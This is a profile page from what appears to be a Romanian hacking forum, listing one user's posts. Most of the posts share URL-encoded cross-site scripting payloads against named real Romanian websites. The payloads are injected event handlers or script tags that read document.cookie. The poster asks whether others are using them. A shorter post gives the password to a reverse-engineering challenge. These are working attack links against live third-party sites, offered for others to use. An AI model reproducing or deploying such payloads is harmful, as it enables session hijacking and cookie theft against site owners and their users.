![](https://rstforums.com/forum/uploads/set_resources_17/84c1e40ea0e759e3f1505eb1788ddf3c_pattern.png)
yulyul2004
-
Posts
43 -
Joined
-
Last visited
-
Days Won
1
Posts posted by yulyul2004
-
-
testat pe firefox 2 si ie 7
e pus pe onfocus la search, deci tre sa dati click pe textbox sau sa ajungeti la textbox cu tab
http://club.neogen.ro/search_prieteni/?1=1&view=search&search_by=&searchtext=%27%6F%6E%66%6F%63%75%73%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3E&simple=
sau onmouseover pe textbox-ul de search sau pe linkurile de next/back din josul paginii:
http://club.neogen.ro/search_prieteni/?1=1&view=search&search_by=&searchtext=%27%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3E&simple=
Poate fi exploatat mai bine.
foloseste cineva XSS-urile astea? sa stiu daca mai pun.
-
la asta e misto ca raman ultimele cautari pe fiecare sessionid
http://www.gsptv.ro/videoList1.php?tag=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
-
a fost destul de simplu.
in prima instanta am incercat sa deschid form-ul 2 indiferent daca parola era buna sau nu, dar evident nu se decripta corect poza.
apoi am gasit functia care decripta string-ul din resurse si asa am aflat parola.
-
http://www.realitatea.net/cautare/%253C%2553%2543%2552%2549%2550%2554%253E%2561%256C%2565%2572%2574%2528%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565%2529%253C%252F%2553%2543%2552%2549%2550%2554%253E
-
Numarul de caractere l-am pus la nimereala. Nu am scris parola ca ma gandeam ca se mai chinue cineva si nu vroiam sa-i stric surpriza
Parola este: a6!SOUND!128!FreshMeat (are 22 de caractere).
Am folosit IDA Pro v5.2 si P32Dasm 2.3.
-
1
-
-
Iata poza:
si parola este:*************
www.bestjobs.ro
in XSS (cross site scripting)
Posted
pana ieri mergea si asta, dar s-au prins
astazi am gasit asta:
la onfocus pe textbox-ul de cautare:
la onmouseover pe textbox-ul de cautare:
merge si cu document.cookie